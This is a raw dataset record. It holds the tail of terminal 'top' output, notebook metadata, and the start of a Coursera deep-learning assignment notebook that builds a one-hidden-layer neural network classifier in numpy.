\u001b[m\u001b[msleeping,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mstopped,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mzombie\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.2 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.0 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606688 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584772 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560764 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745940 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 1.3 0.2 0:00.82 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 2519 root -51 0 0 0 0 S 0.3 0.0 0:11.24 irq/37-nvi+ \u001b[m\u001b[m\u001b[K\n\u001b[m\u001b[1m 4348 narain.+ 20 0 40520 3740 3132 R 0.3 0.0 0:00.01 top \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:18 up 1:41, 4 users, load average: 1.02, 0.35, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.4 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.2 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 99.4 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606720 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 584744 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1560760 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25745964 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 2.0 0.2 0:00.88 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 3028 root 20 0 304464 60808 12320 S 0.3 0.2 0:05.03 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 14 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 15 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/1 \u001b[m\u001b[m\u001b[K\n\u001b[m 18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:+ \u001b[m\u001b[m\u001b[K\u001b[H\u001b[mtop - 06:22:21 up 1:41, 4 users, load average: 0.94, 0.34, 0.12\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\n%Cpu(s):\u001b[m\u001b[m\u001b[1m 0.5 \u001b[m\u001b[mus,\u001b[m\u001b[m\u001b[1m 0.3 \u001b[m\u001b[msy,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mni,\u001b[m\u001b[m\u001b[1m 97.4 \u001b[m\u001b[mid,\u001b[m\u001b[m\u001b[1m 1.8 \u001b[m\u001b[mwa,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mhi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[msi,\u001b[m\u001b[m\u001b[1m 0.0 \u001b[m\u001b[mst\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Mem :\u001b[m\u001b[m\u001b[1m 26752224 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 24606148 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 583912 \u001b[m\u001b[mused,\u001b[m\u001b[m\u001b[1m 1562164 \u001b[m\u001b[mbuff/cache\u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\nKiB Swap:\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mtotal,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mfree,\u001b[m\u001b[m\u001b[1m 0 \u001b[m\u001b[mused.\u001b[m\u001b[m\u001b[1m 25746696 \u001b[m\u001b[mavail Mem \u001b[m\u001b[m\u001b[m\u001b[m\u001b[K\n\u001b[K\n\n\u001b[m 3741 narain.+ 20 0 598636 47232 11280 S 1.7 0.2 0:00.93 python3 \u001b[m\u001b[m\u001b[K\n\u001b[m 3028 root 20 0 304464 60808 12320 S 1.3 0.2 0:05.07 jupyter-no+ \u001b[m\u001b[m\u001b[K\n\u001b[m 2519 root -51 0 0 0 0 S 0.3 0.0 0:11.25 irq/37-nvi+ \u001b[m\u001b[m\u001b[K\n\u001b[m 3220 srihars+ 20 0 97824 5180 3756 S 0.3 0.0 0:00.32 sshd \u001b[m\u001b[m\u001b[K\n\u001b[m\u001b[1m 4348 narain.+ 20 0 40520 3740 3132 R 0.3 0.0 0:00.02 top \u001b[m\u001b[m\u001b[K\n\u001b[m 1 root 20 0 119952 6100 3976 S 0.0 0.0 0:07.39 systemd \u001b[m\u001b[m\u001b[K\n\u001b[m 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd \u001b[m\u001b[m\u001b[K\n\u001b[m 4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:+ \u001b[m\u001b[m\u001b[K\n\u001b[m 6 root 20 0 0 0 0 S 0.0 0.0 0:00.02 ksoftirqd/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 7 root 20 0 0 0 0 S 0.0 0.0 0:00.12 rcu_sched \u001b[m\u001b[m\u001b[K\n\u001b[m 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh \u001b[m\u001b[m\u001b[K\n\u001b[m 9 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-dr+ \u001b[m\u001b[m\u001b[K\n\u001b[m 11 root rt 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0 \u001b[m\u001b[m\u001b[K\n\u001b[m 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1 \u001b[m\u001b[m\u001b[K\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
e72e9311412bc664e947f7e652cb1579ec28055d
562,829
ipynb
Jupyter Notebook
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
1
2021-01-21T07:03:54.000Z
2021-01-21T07:03:54.000Z
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
null
null
null
Neural-Networks-and-Deep-Learning/Week 3/Planar_data_classification_with_onehidden_layer.ipynb
vishwapardeshi/Deep-Learning
bedd373cab2dbeaa82441c32a4e983aa99afbcfe
[ "MIT" ]
null
null
null
351.988118
331,108
0.914365
[ [ [ "\n### <font color = \"darkblue\">Updates to Assignment</font>\n\n#### If you were working on the older version:\n* Please click on the \"Coursera\" icon in the top right to open up the folder directory. \n* Navigate to the folder: Week 3/ Planar data classification with one hidden layer. You can see your prior work in version 6b: \"Planar data classification with one hidden layer v6b.ipynb\"\n\n#### List of bug fixes and enhancements\n* Clarifies that the classifier will learn to classify regions as either red or blue.\n* compute_cost function fixes np.squeeze by casting it as a float.\n* compute_cost instructions clarify the purpose of np.squeeze.\n* compute_cost clarifies that \"parameters\" parameter is not needed, but is kept in the function definition until the auto-grader is also updated.\n* nn_model removes extraction of parameter values, as the entire parameter dictionary is passed to the invoked functions.", "_____no_output_____" ], [ "# Planar data classification with one hidden layer\n\nWelcome to your week 3 programming assignment. It's time to build your first neural network, which will have a hidden layer. You will see a big difference between this model and the one you implemented using logistic regression. \n\n**You will learn how to:**\n- Implement a 2-class classification neural network with a single hidden layer\n- Use units with a non-linear activation function, such as tanh \n- Compute the cross entropy loss \n- Implement forward and backward propagation\n", "_____no_output_____" ], [ "## 1 - Packages ##\n\nLet's first import all the packages that you will need during this assignment.\n- [numpy](https://www.numpy.org/) is the fundamental package for scientific computing with Python.\n- [sklearn](http://scikit-learn.org/stable/) provides simple and efficient tools for data mining and data analysis. \n- [matplotlib](http://matplotlib.org) is a library for plotting graphs in Python.\n- testCases provides some test examples to assess the correctness of your functions\n- planar_utils provide various useful functions used in this assignment", "_____no_output_____" ] ], [ [ "# Package imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom testCases_v2 import *\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets\n\n%matplotlib inline\n\nnp.random.seed(1) # set a seed so that the results are consistent", "_____no_output_____" ] ], [ [ "## 2 - Dataset ##\n\nFirst, let's get the dataset you will work on. The following code will load a \"flower\" 2-class dataset into variables `X` and `Y`.", "_____no_output_____" ] ], [ [ "X, Y = load_planar_dataset()", "_____no_output_____" ] ], [ [ "Visualize the dataset using matplotlib. The data looks like a \"flower\" with some red (label y=0) and some blue (y=1) points. Your goal is to build a model to fit this data. In other words, we want the classifier to define regions as either red or blue.", "_____no_output_____" ] ], [ [ "# Visualize the data:\nplt.scatter(X[0, :], X[1, :], c=Y, s=40, cmap=plt.cm.Spectral);", "_____no_output_____" ] ], [ [ "You have:\n - a numpy-array (matrix) X that contains your features (x1, x2)\n - a numpy-array (vector) Y that contains your labels (red:0, blue:1).\n\nLets first get a better sense of what our data is like. \n\n**Exercise**: How many training examples do you have? In addition, what is the `shape` of the variables `X` and `Y`? \n\n**Hint**: How do you get the shape of a numpy array? [(help)](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html)", "_____no_output_____" ] ], [ [ "### START CODE HERE ### (≈ 3 lines of code)\nshape_X = X.shape\nshape_Y = Y.shape\nm = X.shape[1] # training set size\n### END CODE HERE ###\n\nprint ('The shape of X is: ' + str(shape_X))\nprint ('The shape of Y is: ' + str(shape_Y))\nprint ('I have m = %d training examples!' % (m))", "The shape of X is: (2, 400)\nThe shape of Y is: (1, 400)\nI have m = 400 training examples!\n" ] ], [ [ "**Expected Output**:\n \n<table style=\"width:20%\">\n \n <tr>\n <td>**shape of X**</td>\n <td> (2, 400) </td> \n </tr>\n \n <tr>\n <td>**shape of Y**</td>\n <td>(1, 400) </td> \n </tr>\n \n <tr>\n <td>**m**</td>\n <td> 400 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "## 3 - Simple Logistic Regression\n\nBefore building a full neural network, lets first see how logistic regression performs on this problem. You can use sklearn's built-in functions to do that. Run the code below to train a logistic regression classifier on the dataset.", "_____no_output_____" ] ], [ [ "# Train the logistic regression classifier\nclf = sklearn.linear_model.LogisticRegressionCV();\nclf.fit(X.T, Y.T);", "_____no_output_____" ] ], [ [ "You can now plot the decision boundary of these models. Run the code below.", "_____no_output_____" ] ], [ [ "# Plot the decision boundary for logistic regression\nplot_decision_boundary(lambda x: clf.predict(x), X, Y)\nplt.title(\"Logistic Regression\")\n\n# Print accuracy\nLR_predictions = clf.predict(X.T)\nprint ('Accuracy of logistic regression: %d ' % float((np.dot(Y,LR_predictions) + np.dot(1-Y,1-LR_predictions))/float(Y.size)*100) +\n '% ' + \"(percentage of correctly labelled datapoints)\")", "Accuracy of logistic regression: 47 % (percentage of correctly labelled datapoints)\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:20%\">\n <tr>\n <td>**Accuracy**</td>\n <td> 47% </td> \n </tr>\n \n</table>\n", "_____no_output_____" ], [ "**Interpretation**: The dataset is not linearly separable, so logistic regression doesn't perform well. Hopefully a neural network will do better. Let's try this now! ", "_____no_output_____" ], [ "## 4 - Neural Network model\n\nLogistic regression did not work well on the \"flower dataset\". You are going to train a Neural Network with a single hidden layer.\n\n**Here is our model**:\n<img src=\"images/classification_kiank.png\" style=\"width:600px;height:300px;\">\n\n**Mathematically**:\n\nFor one example $x^{(i)}$:\n$$z^{[1] (i)} = W^{[1]} x^{(i)} + b^{[1]}\\tag{1}$$ \n$$a^{[1] (i)} = \\tanh(z^{[1] (i)})\\tag{2}$$\n$$z^{[2] (i)} = W^{[2]} a^{[1] (i)} + b^{[2]}\\tag{3}$$\n$$\\hat{y}^{(i)} = a^{[2] (i)} = \\sigma(z^{ [2] (i)})\\tag{4}$$\n$$y^{(i)}_{prediction} = \\begin{cases} 1 & \\mbox{if } a^{[2](i)} > 0.5 \\\\ 0 & \\mbox{otherwise } \\end{cases}\\tag{5}$$\n\nGiven the predictions on all the examples, you can also compute the cost $J$ as follows: \n$$J = - \\frac{1}{m} \\sum\\limits_{i = 0}^{m} \\large\\left(\\small y^{(i)}\\log\\left(a^{[2] (i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[2] (i)}\\right) \\large \\right) \\small \\tag{6}$$\n\n**Reminder**: The general methodology to build a Neural Network is to:\n 1. Define the neural network structure ( # of input units, # of hidden units, etc). \n 2. Initialize the model's parameters\n 3. Loop:\n - Implement forward propagation\n - Compute loss\n - Implement backward propagation to get the gradients\n - Update parameters (gradient descent)\n\nYou often build helper functions to compute steps 1-3 and then merge them into one function we call `nn_model()`. Once you've built `nn_model()` and learnt the right parameters, you can make predictions on new data.", "_____no_output_____" ], [ "### 4.1 - Defining the neural network structure ####\n\n**Exercise**: Define three variables:\n - n_x: the size of the input layer\n - n_h: the size of the hidden layer (set this to 4) \n - n_y: the size of the output layer\n\n**Hint**: Use shapes of X and Y to find n_x and n_y. Also, hard code the hidden layer size to be 4.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: layer_sizes\n\ndef layer_sizes(X, Y):\n \"\"\"\n Arguments:\n X -- input dataset of shape (input size, number of examples)\n Y -- labels of shape (output size, number of examples)\n \n Returns:\n n_x -- the size of the input layer\n n_h -- the size of the hidden layer\n n_y -- the size of the output layer\n \"\"\"\n ### START CODE HERE ### (≈ 3 lines of code)\n n_x = X.shape[0] # size of input layer\n n_h = 4\n n_y = Y.shape[0] # size of output layer\n ### END CODE HERE ###\n return (n_x, n_h, n_y)", "_____no_output_____" ], [ "X_assess, Y_assess = layer_sizes_test_case()\n(n_x, n_h, n_y) = layer_sizes(X_assess, Y_assess)\nprint(\"The size of the input layer is: n_x = \" + str(n_x))\nprint(\"The size of the hidden layer is: n_h = \" + str(n_h))\nprint(\"The size of the output layer is: n_y = \" + str(n_y))", "The size of the input layer is: n_x = 5\nThe size of the hidden layer is: n_h = 4\nThe size of the output layer is: n_y = 2\n" ] ], [ [ "**Expected Output** (these are not the sizes you will use for your network, they are just used to assess the function you've just coded).\n\n<table style=\"width:20%\">\n <tr>\n <td>**n_x**</td>\n <td> 5 </td> \n </tr>\n \n <tr>\n <td>**n_h**</td>\n <td> 4 </td> \n </tr>\n \n <tr>\n <td>**n_y**</td>\n <td> 2 </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "### 4.2 - Initialize the model's parameters ####\n\n**Exercise**: Implement the function `initialize_parameters()`.\n\n**Instructions**:\n- Make sure your parameters' sizes are right. Refer to the neural network figure above if needed.\n- You will initialize the weights matrices with random values. \n - Use: `np.random.randn(a,b) * 0.01` to randomly initialize a matrix of shape (a,b).\n- You will initialize the bias vectors as zeros. \n - Use: `np.zeros((a,b))` to initialize a matrix of shape (a,b) with zeros.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: initialize_parameters\n\ndef initialize_parameters(n_x, n_h, n_y):\n \"\"\"\n Argument:\n n_x -- size of the input layer\n n_h -- size of the hidden layer\n n_y -- size of the output layer\n \n Returns:\n params -- python dictionary containing your parameters:\n W1 -- weight matrix of shape (n_h, n_x)\n b1 -- bias vector of shape (n_h, 1)\n W2 -- weight matrix of shape (n_y, n_h)\n b2 -- bias vector of shape (n_y, 1)\n \"\"\"\n \n np.random.seed(2) # we set up a seed so that your output matches ours although the initialization is random.\n \n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = np.random.randn(n_h, n_x) * 0.01\n b1 = np.zeros((n_h, 1))\n W2 = np.random.randn(n_y, n_h) * 0.01\n b2 = np.zeros((n_y, 1))\n ### END CODE HERE ###\n \n assert (W1.shape == (n_h, n_x))\n assert (b1.shape == (n_h, 1))\n assert (W2.shape == (n_y, n_h))\n assert (b2.shape == (n_y, 1))\n \n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters", "_____no_output_____" ], [ "n_x, n_h, n_y = initialize_parameters_test_case()\n\nparameters = initialize_parameters(n_x, n_h, n_y)\nprint(\"W1 = \" + str(parameters[\"W1\"]))\nprint(\"b1 = \" + str(parameters[\"b1\"]))\nprint(\"W2 = \" + str(parameters[\"W2\"]))\nprint(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = [[-0.00416758 -0.00056267]\n [-0.02136196 0.01640271]\n [-0.01793436 -0.00841747]\n [ 0.00502881 -0.01245288]]\nb1 = [[ 0.]\n [ 0.]\n [ 0.]\n [ 0.]]\nW2 = [[-0.01057952 -0.00909008 0.00551454 0.02292208]]\nb2 = [[ 0.]]\n" ] ], [ [ "**Expected Output**:\n\n<table style=\"width:90%\">\n <tr>\n <td>**W1**</td>\n <td> [[-0.00416758 -0.00056267]\n [-0.02136196 0.01640271]\n [-0.01793436 -0.00841747]\n [ 0.00502881 -0.01245288]] </td> \n </tr>\n \n <tr>\n <td>**b1**</td>\n <td> [[ 0.]\n [ 0.]\n [ 0.]\n [ 0.]] </td> \n </tr>\n \n <tr>\n <td>**W2**</td>\n <td> [[-0.01057952 -0.00909008 0.00551454 0.02292208]]</td> \n </tr>\n \n\n <tr>\n <td>**b2**</td>\n <td> [[ 0.]] </td> \n </tr>\n \n</table>\n\n", "_____no_output_____" ], [ "### 4.3 - The Loop ####\n\n**Question**: Implement `forward_propagation()`.\n\n**Instructions**:\n- Look above at the mathematical representation of your classifier.\n- You can use the function `sigmoid()`. It is built-in (imported) in the notebook.\n- You can use the function `np.tanh()`. It is part of the numpy library.\n- The steps you have to implement are:\n 1. Retrieve each parameter from the dictionary \"parameters\" (which is the output of `initialize_parameters()`) by using `parameters[\"..\"]`.\n 2. Implement Forward Propagation. Compute $Z^{[1]}, A^{[1]}, Z^{[2]}$ and $A^{[2]}$ (the vector of all your predictions on all the examples in the training set).\n- Values needed in the backpropagation are stored in \"`cache`\". The `cache` will be given as an input to the backpropagation function.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: forward_propagation\n\ndef forward_propagation(X, parameters):\n \"\"\"\n Argument:\n X -- input data of size (n_x, m)\n parameters -- python dictionary containing your parameters (output of initialization function)\n \n Returns:\n A2 -- The sigmoid output of the second activation\n cache -- a dictionary containing \"Z1\", \"A1\", \"Z2\" and \"A2\"\n \"\"\"\n # Retrieve each parameter from the dictionary \"parameters\"\n ### START CODE HERE ### (≈ 4 lines of code)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n ### END CODE HERE ###\n \n # Implement Forward Propagation to calculate A2 (probabilities)\n ### START CODE HERE ### (≈ 4 lines of code)\n Z1 = np.dot(W1, X) + b1\n A1 = np.tanh(Z1)\n Z2 = np.dot(W2,A1) + b2\n A2 = sigmoid(Z2)\n ### END CODE HERE ###\n \n assert(A2.shape == (1, X.shape[1]))\n \n cache = {\"Z1\": Z1,\n \"A1\": A1,\n \"Z2\": Z2,\n \"A2\": A2}\n \n return A2, cache", "_____no_output_____" ], [ "X_assess, parameters = forward_propagation_test_case()\nA2, cache = forward_propagation(X_assess, parameters)\n\n# Note: we use the mean here just to make sure that your output matches ours. \nprint(np.mean(cache['Z1']) ,np.mean(cache['A1']),np.mean(cache['Z2']),np.mean(cache['A2']))", "0.262818640198 0.091999045227 -1.30766601287 0.212877681719\n" ] ], [ [ "**Expected Output**:\n<table style=\"width:50%\">\n <tr>\n <td> 0.262818640198 0.091999045227 -1.30766601287 0.212877681719 </td> \n </tr>\n</table>", "_____no_output_____" ], [ "Now that you have computed $A^{[2]}$ (in the Python variable \"`A2`\"), which contains $a^{[2](i)}$ for every example, you can compute the cost function as follows:\n\n$$J = - \\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(} \\small y^{(i)}\\log\\left(a^{[2] (i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[2] (i)}\\right) \\large{)} \\small\\tag{13}$$\n\n**Exercise**: Implement `compute_cost()` to compute the value of the cost $J$.\n\n**Instructions**:\n- There are many ways to implement the cross-entropy loss. To help you, we give you how we would have implemented\n$- \\sum\\limits_{i=0}^{m} y^{(i)}\\log(a^{[2](i)})$:\n```python\nlogprobs = np.multiply(np.log(A2),Y)\ncost = - np.sum(logprobs) # no need to use a for loop!\n```\n\n(you can use either `np.multiply()` and then `np.sum()` or directly `np.dot()`). \nNote that if you use `np.multiply` followed by `np.sum` the end result will be a type `float`, whereas if you use `np.dot`, the result will be a 2D numpy array. We can use `np.squeeze()` to remove redundant dimensions (in the case of single float, this will be reduced to a zero-dimension array). We can cast the array as a type `float` using `float()`.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: compute_cost\n\ndef compute_cost(A2, Y, parameters):\n \"\"\"\n Computes the cross-entropy cost given in equation (13)\n \n Arguments:\n A2 -- The sigmoid output of the second activation, of shape (1, number of examples)\n Y -- \"true\" labels vector of shape (1, number of examples)\n parameters -- python dictionary containing your parameters W1, b1, W2 and b2\n [Note that the parameters argument is not used in this function, \n but the auto-grader currently expects this parameter.\n Future version of this notebook will fix both the notebook \n and the auto-grader so that `parameters` is not needed.\n For now, please include `parameters` in the function signature,\n and also when invoking this function.]\n \n Returns:\n cost -- cross-entropy cost given equation (13)\n \n \"\"\"\n \n m = Y.shape[1] # number of example\n\n # Compute the cross-entropy cost\n ### START CODE HERE ### (≈ 2 lines of code)\n logprobs = np.multiply(np.log(A2), Y) + np.multiply((1 - Y), np.log(1 - A2))\n cost = - np.sum(logprobs) / m \n ### END CODE HERE ###\n \n cost = float(np.squeeze(cost)) # makes sure cost is the dimension we expect. \n # E.g., turns [[17]] into 17 \n assert(isinstance(cost, float))\n \n return cost", "_____no_output_____" ], [ "A2, Y_assess, parameters = compute_cost_test_case()\n\nprint(\"cost = \" + str(compute_cost(A2, Y_assess, parameters)))", "cost = 0.6930587610394646\n" ] ], [ [ "**Expected Output**:\n<table style=\"width:20%\">\n <tr>\n <td>**cost**</td>\n <td> 0.693058761... </td> \n </tr>\n \n</table>", "_____no_output_____" ], [ "Using the cache computed during forward propagation, you can now implement backward propagation.\n\n**Question**: Implement the function `backward_propagation()`.\n\n**Instructions**:\nBackpropagation is usually the hardest (most mathematical) part in deep learning. To help you, here again is the slide from the lecture on backpropagation. You'll want to use the six equations on the right of this slide, since you are building a vectorized implementation. \n\n<img src=\"images/grad_summary.png\" style=\"width:600px;height:300px;\">\n\n<!--\n$\\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } = \\frac{1}{m} (a^{[2](i)} - y^{(i)})$\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial W_2 } = \\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } a^{[1] (i) T} $\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial b_2 } = \\sum_i{\\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)}}}$\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)} } = W_2^T \\frac{\\partial \\mathcal{J} }{ \\partial z_{2}^{(i)} } * ( 1 - a^{[1] (i) 2}) $\n\n$\\frac{\\partial \\mathcal{J} }{ \\partial W_1 } = \\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)} } X^T $\n\n$\\frac{\\partial \\mathcal{J} _i }{ \\partial b_1 } = \\sum_i{\\frac{\\partial \\mathcal{J} }{ \\partial z_{1}^{(i)}}}$\n\n- Note that $*$ denotes elementwise multiplication.\n- 